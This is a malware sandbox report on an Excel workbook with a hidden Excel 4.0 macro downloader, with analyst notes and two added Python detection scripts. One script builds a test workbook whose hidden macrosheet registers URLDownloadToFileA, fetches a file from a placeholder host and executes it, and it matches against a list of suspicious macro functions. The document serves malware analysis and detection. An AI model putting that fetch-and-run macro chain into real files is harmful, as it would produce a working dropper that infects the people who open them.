Score: 88 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Evidence rows at the top of the report whose signature headings are not in this extract: file opened; HTTPS traffic detected; binary string (2 rows); code function 4_2_6E725D36.
Software Vulnerabilities:

Document exploit detected (creates forbidden files)
  Evidence: file created
Document exploit detected (drops PE files)
  Evidence: file created (dropped file)
Document exploit detected (UrlDownloadToFile)
  Evidence: section loaded
Document exploit detected (process start blacklist hit)
  Evidence: process created
Potential document exploit detected (performs DNS queries)
  Evidence: DNS query
Potential document exploit detected (performs HTTP gets)
  Evidence: TCP traffic
Potential document exploit detected (unknown TCP traffic)
  Evidence: TCP traffic

Note: no CVE is named anywhere in this report. The "document exploit" signatures are behavioural: they fire when the Office process writes files, drops a PE, loads the library that exports URLDownloadToFile (urlmon.dll), starts a blacklisted process or talks to the network. A macro-driven downloader produces exactly the same behaviour as a memory-corruption exploit, so read these rows together with the Excel 4.0 macro findings under System Summary before reporting an exploit.
Networking:

JA3 SSL client fingerprint seen in connection with other malware
  Evidence: JA3 fingerprint (hash not captured)

Further rows in this section whose signature headings are not in the extract: file created; string found in binary or memory (11 rows); DNS traffic detected; network traffic detected (2 rows); HTTPS traffic detected.

Note: a JA3 hash identifies the TLS client stack, not the malware. Office, and any downloader that goes through WinHTTP or WinINet, presents the Windows Schannel fingerprint that a great deal of benign software shares, so this signature is corroborating evidence at best; the destinations in the IP and domain tables at the end of the report are the actionable part.
System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  Evidence: screenshot OCR (10 rows)
Found Excel 4.0 Macro with suspicious formulas
  Evidence: initial sample (2 rows)
Found abnormal large hidden Excel 4.0 Macro sheet
  Evidence: initial sample
Office process drops PE file
  Evidence: file created (2 rows, dropped files)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
  Evidence: memory allocated (2 rows)
Detected potential crypto function
  Code functions: 4_2_6E72A4E1, 4_2_6E71353B, 4_2_6E71F5B3, 4_2_6E721580, 4_2_6E777C26, 4_2_6E77B44E, 4_2_6E78798C
Document contains embedded VBA macros
  Evidence: OLE indicator, VBA macros
Dropped file seen in connection with other malware
  Evidence: dropped file (2 rows; the match is on the file hash, which is not captured)
Found potential string decryption / allocating functions
  Evidence: code function (address not captured)
Yara signature match
  Evidence: matched rule (rule name not captured)

Further rows in this section whose signature headings are not in the extract: binary or memory string; classification label; file created (2 rows); OLE indicator, Workbook stream; file read; key opened (2 rows); process created (6 rows); window detected; file opened; binary string (2 rows).

Note: the OLE indicator rows show the sample is a legacy compound-file workbook (a BIFF Workbook stream) that carries both a VBA project and an Excel 4.0 (XLM) macro sheet, and the OCR signature means the first screenshot is a lure asking the victim to enable content. The XLM findings (suspicious formulas, an abnormally large hidden sheet) together with the UrlDownloadToFile row under Software Vulnerabilities point to the Excel 4.0 sheet as the downloader stage; the VBA project still needs its own review, since the report does not say whether it runs anything.
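The two Excel 4.0 rows above (suspicious formulas; an abnormally large hidden macro sheet) are the checks an analyst reproduces first. The following is an added example, not part of the sandbox report or its vendor's code, that performs both checks on an OOXML (.xlsm) workbook: it walks the workbook's sheet list, follows the relationship type that marks an Excel 4.0 macrosheet, reads each sheet's visibility state and formulas, and flags REGISTER/EXEC-style functions and API names such as URLDownloadToFile. The sample analysed in this report is a legacy OLE workbook (see the Workbook-stream row), where the same information lives in BIFF BOUNDSHEET records and needs an OLE/BIFF parser such as oletools' olevba; the OOXML form is shown because it can be built and parsed with the standard library alone. The workbook, its formulas, the list of suspicious functions and the size threshold of 100 cells are constructed for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Real OOXML schema URIs; the macrosheet relationship type is what marks an
# Excel 4.0 (XLM) sheet as opposed to an ordinary worksheet.
NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_PKG_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_MACROSHEET = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"

# XLM functions that execute code, bind DLL exports or write files. Cell
# arithmetic never needs them, so any hit is worth a look (list is an assumption).
SUSPICIOUS_FUNCS = re.compile(
    r"\b(EXEC|CALL|REGISTER|FORMULA(?:\.FILL)?|RUN|FOPEN|FWRITE|FILES)\s*\(", re.I)
# API names that only appear as string arguments to REGISTER/CALL.
SUSPICIOUS_STRINGS = ("URLDownloadToFile", "ShellExecute", "VirtualAlloc", "WriteProcessMemory")
# "Abnormally large" threshold for a hidden sheet; an assumption for this example.
LARGE_SHEET_CELLS = 100


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def analyze_workbook(data):
    """Inspect every Excel 4.0 macrosheet in an .xlsm given as bytes."""
    findings = {"macrosheets": [], "flags": set()}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
        rel_map = {r.get("Id"): (r.get("Type"), r.get("Target"))
                   for r in rels if _local(r.tag) == "Relationship"}
        for sheet in wb.iter(f"{{{NS_MAIN}}}sheet"):
            rtype, target = rel_map[sheet.get(f"{{{NS_REL}}}id")]
            if rtype != REL_MACROSHEET:
                continue  # ordinary worksheet
            part = target.lstrip("/") if target.startswith("/") else "xl/" + target
            root = ET.fromstring(z.read(part))
            formulas = [f.text or "" for f in root.iter() if _local(f.tag) == "f"]
            funcs = sorted({m.group(1).upper() for fm in formulas
                            for m in SUSPICIOUS_FUNCS.finditer(fm)})
            strings = sorted(s for s in SUSPICIOUS_STRINGS
                             if any(s.lower() in fm.lower() for fm in formulas))
            state = sheet.get("state", "visible")  # visible | hidden | veryHidden
            findings["macrosheets"].append({
                "name": sheet.get("name"), "state": state,
                "formula_cells": len(formulas),
                "suspicious_functions": funcs, "suspicious_strings": strings})
            if state != "visible":
                findings["flags"].add("hidden_macrosheet")
                if len(formulas) > LARGE_SHEET_CELLS:
                    findings["flags"].add("large_hidden_macrosheet")
            if funcs or strings:
                findings["flags"].add("suspicious_xlm_formulas")
    findings["flags"] = sorted(findings["flags"])
    return findings


def build_sample_xlsm(with_macro=True):
    """Constructed sample: one visible sheet, optionally one veryHidden XLM sheet."""
    sheets = '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
    rel_rows = f'<Relationship Id="rId1" Type="{NS_REL}/worksheet" Target="worksheets/sheet1.xml"/>'
    if with_macro:
        sheets += '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
        rel_rows += f'<Relationship Id="rId2" Type="{REL_MACROSHEET}" Target="macrosheets/sheet1.xml"/>'
    workbook = f'<workbook xmlns="{NS_MAIN}" xmlns:r="{NS_REL}"><sheets>{sheets}</sheets></workbook>'
    rels = f'<Relationships xmlns="{NS_PKG_REL}">{rel_rows}</Relationships>'
    sheet1 = f'<worksheet xmlns="{NS_MAIN}"><sheetData><row r="1"><c r="A1"><v>1</v></c></row></sheetData></worksheet>'
    # A typical downloader chain: bind URLDownloadToFileA, fetch, run. Then
    # padding cells of the kind used to bloat the sheet past scanner limits.
    rows = [
        '<row r="1"><c r="A1"><f>REGISTER("urlmon","URLDownloadToFileA","JJCCJJ","dl",,1,9)</f></c></row>',
        '<row r="2"><c r="A2"><f>dl(0,"http://example.invalid/x","C:\\Users\\Public\\x.exe",0,0)</f></c></row>',
        '<row r="3"><c r="A3"><f>EXEC("C:\\Users\\Public\\x.exe")</f></c></row>',
    ]
    rows += [f'<row r="{i}"><c r="A{i}"><f>CHAR({60 + i})</f></c></row>'
             for i in range(4, 4 + LARGE_SHEET_CELLS)]
    macro = f'<macrosheet xmlns="{NS_MAIN}"><sheetData>{"".join(rows)}</sheetData></macrosheet>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/_rels/workbook.xml.rels", rels)
        z.writestr("xl/worksheets/sheet1.xml", sheet1)
        if with_macro:
            z.writestr("xl/macrosheets/sheet1.xml", macro)
    return buf.getvalue()


if __name__ == "__main__":
    print(analyze_workbook(build_sample_xlsm()))
```

The visibility state matters as much as the formulas: a `veryHidden` sheet cannot be unhidden from the Excel UI at all, which is why it is the usual home for the macro stage, and the padding rows are what pushes the sheet past a size-based "abnormal" threshold while keeping the live formulas in the first few cells.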
Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
  Code functions: 4_2_6E72AC34, 4_2_6E779700, 4_2_6E73C6D6, 4_2_6E73EEC5, 4_2_6E73D7D4, 4_2_6E73CAF0, 4_2_6E73E144, 4_2_6E7906A8, 4_2_6E791CD7, 4_2_6E7929F7

Note: every code-function address in this report falls in the 0x6E71xxxx to 0x6E79xxxx range, consistent with a single 32-bit module image that the extract does not name. The push/ret pattern flagged here (push a target address, then ret, instead of a direct call or jmp) defeats static call-graph recovery; it is also what a packer's unpacking stub tends to look like, and the string-decryption and crypto-function hits under System Summary sit in the same module.
Persistence and Installation Behavior:

Drops PE files
  Evidence: file created (2 rows, dropped files)
Drops PE files to the user directory
  Evidence: file created (dropped file)
Drops files with a non-matching file extension (content does not match file extension)
  Evidence: file created (dropped file)

Note: the last signature means the content type sniffed from the dropped file's header disagrees with its extension. Since the other rows in this section show PE files being dropped, the likely case is a PE body behind a non-executable name; when hunting for the artefact on endpoints, match on the MZ/PE header rather than on *.exe.
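The rows above (PE files dropped under the user directory; a dropped file whose content does not match its extension) are checks worth having in a triage script. The following is an added example, not part of the sandbox report or its vendor's code, that sniffs a dropped file's container type from its leading bytes, validates the PE header an MZ stub points at rather than trusting the two-byte magic, compares the result with what the extension promises, and classifies where under the profile the file landed. The file names, paths, byte contents and the minimal PE images are constructed for the example and do not come from the report.

```python
import ntpath
import struct

# Leading bytes of the container types that matter when triaging dropped files.
MAGIC = [
    (b"MZ", "pe"),
    (b"\x7fELF", "elf"),
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"),                                 # also OOXML, JAR, APK
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),           # legacy .doc / .xls
]
# What an extension promises. Extensions not listed promise nothing, so a
# PE body behind ".dat" or ".tmp" is still a mismatch.
EXPECTED = {
    ".exe": "pe", ".dll": "pe", ".scr": "pe", ".sys": "pe",
    ".pdf": "pdf", ".zip": "zip", ".docx": "zip", ".xlsx": "zip", ".xlsm": "zip",
    ".doc": "ole", ".xls": "ole",
}
IMAGE_FILE_DLL = 0x2000  # Characteristics bit in the COFF file header


def sniff(data):
    """Container type from the leading bytes, or None if not recognised."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return None


def pe_info(data):
    """Validate the PE header the MZ stub points at; None if it is not a real PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    characteristics = struct.unpack_from("<H", data, e_lfanew + 22)[0]
    return {"machine": machine, "sections": nsections,
            "is_dll": bool(characteristics & IMAGE_FILE_DLL)}


def location(path):
    """user_root = directly in C:\\Users\\<name>; user_profile = deeper in it; other."""
    parts = path.replace("/", "\\").split("\\")
    if len(parts) >= 3 and parts[0].lower() == "c:" and parts[1].lower() == "users":
        return "user_root" if len(parts) == 4 else "user_profile"
    return "other"


def classify_dropped(path, data):
    """Compare sniffed content with the extension and report the PE header, if any."""
    ext = ntpath.splitext(path)[1].lower()
    kind = sniff(data)
    expected = EXPECTED.get(ext)
    return {
        "path": path, "ext": ext, "content": kind, "expected": expected,
        # Only claim a mismatch when the bytes are positively identified.
        "mismatch": kind is not None and kind != expected,
        "pe": pe_info(data) if kind == "pe" else None,
        "location": location(path),
    }


def build_min_pe(is_dll=False):
    """Constructed minimal image: DOS stub plus COFF header, enough for pe_info()."""
    characteristics = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)  # EXECUTABLE_IMAGE | 32BIT_MACHINE
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew at 0x3C -> 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, characteristics)
    return dos + coff


# Constructed drop set; names and contents are invented for the example.
SAMPLES = {
    r"C:\Users\Public\invoice.dat": build_min_pe(),               # PE hiding behind .dat
    r"C:\Users\Public\update.exe": build_min_pe(),                # PE where a PE is expected
    r"C:\Users\Public\helper.pdf": build_min_pe(is_dll=True),     # DLL disguised as a PDF
    r"C:\Users\Public\AppData\Local\Temp\x.exe": build_min_pe(),
    r"C:\Users\Public\notes.txt": b"just text\r\n",                # no magic: no claim
    r"C:\Users\Public\report.xls": bytes.fromhex("d0cf11e0a1b11ae1") + b"\0" * 16,
}


def triage(samples=SAMPLES):
    return [classify_dropped(p, d) for p, d in samples.items()]


if __name__ == "__main__":
    for r in triage():
        print(r["path"], r["content"], "MISMATCH" if r["mismatch"] else "ok", r["location"])
```

Two design points: a mismatch is only asserted when the bytes are positively identified, so a text file with an odd extension is not reported; and `pe_info()` walks `e_lfanew` to the `PE\0\0` signature because plenty of non-executable data (and truncated drops) happen to start with `MZ`.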
Boot Survival:

Drops PE files to the user root directory
  Evidence: file created (dropped file)

Further rows in this section whose signature heading is not in the extract: process information set (28 rows).
Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded
  Evidence: dropped PE file which has not been started
Found large amount of non-executed APIs
  Evidence: API coverage (figure not captured); code function 4_2_6E725D36

Note: together these two rows say the run did not reach the payload: a PE was written to disk but never executed, and most of the module's imported APIs were never called. That is consistent with a downloader that stages the file for a later trigger (scheduled task, reboot, user action) or with an environment check that failed inside the sandbox. The dropped file needs its own detonation; the score above reflects the document stage only.
Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
  Code function: 4_2_6E717C49
Contains functionality to check if a debugger is running (IsDebuggerPresent)
  Code function: 4_2_6E7237A2
Contains functionality to read the PEB
  Code functions: 4_2_6E722A8C, 4_2_6E725960, 4_2_6E78FEC2, 4_2_6E78FDF8, 4_2_6E78F9FF
Contains functionality which may be used to detect a debugger (GetProcessHeap)
  Code function: 4_2_6E717D3A

Further code-function rows in this section whose signature heading is not in the extract: 4_2_6E71A7E7, 4_2_6E7237A2, 4_2_6E71A9E4.

Note: IsDebuggerPresent, PEB reads (fs:[30h] in a 32-bit module) and GetProcessHeap all occur in ordinary C runtime start-up code, so on their own they are weak indicators; 4_2_6E7237A2 appears both under IsDebuggerPresent and under an unnamed heading, which is consistent with a shared runtime helper. Resolving exports through the loader (LdrGetProcedureAddress) instead of the import table is the strongest of the four, because it keeps the API set out of static import analysis.
HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
  Evidence: process created (command line not captured)

Note: CreateProcess with CREATE_SUSPENDED followed by writes into the child is the set-up for process hollowing or thread hijacking. On the endpoint, look for a child process whose image on disk does not match its in-memory image; the extract does not name the child, so the process tree in the full report is the place to find it.
Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
  Code function: 4_2_6E71AB0A
Contains functionality to query locales information (e.g. system language)
  Code functions: 4_2_6E784633, 4_2_6E783A74, 4_2_6E783A08, 4_2_6E77FABC, 4_2_6E7840E2

Further code-function row in this section whose signature heading is not in the extract: 4_2_6E71AD36.

Note: cpuid and locale queries serve two purposes this report cannot tell apart: C runtime initialisation (CPU feature detection, setlocale) and environment fingerprinting (the hypervisor-present bit, ECX bit 31 of cpuid leaf 1, or a keyboard-layout or language check that aborts in excluded regions). Confirm which one it is in the disassembly before reporting a geofence or sandbox check.
Contacted IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
---|---|---|---|---|---
172.67.151.10 | otusmail.com | United States | 13335 | CLOUDFLARENETUS | false

Contacted domains:

Name | IP | Active
---|---|---
otusmail.com | 172.67.151.10 | true
cdn.digicertcdn.com | 104.18.10.39 | true

Note: 172.67.151.10 is a Cloudflare edge address (AS13335), so it fronts the origin rather than identifying it and is shared with unrelated Cloudflare customers; block and hunt on the hostname otusmail.com, not the IP. cdn.digicertcdn.com is DigiCert's CDN for certificate revocation data, which Windows fetches while validating the certificate chain of an HTTPS connection, so its presence is a side effect of the TLS session rather than attacker infrastructure. The Malicious column reflects the sandbox's own reputation data at analysis time; "false" means no hit, not that the domain is clean.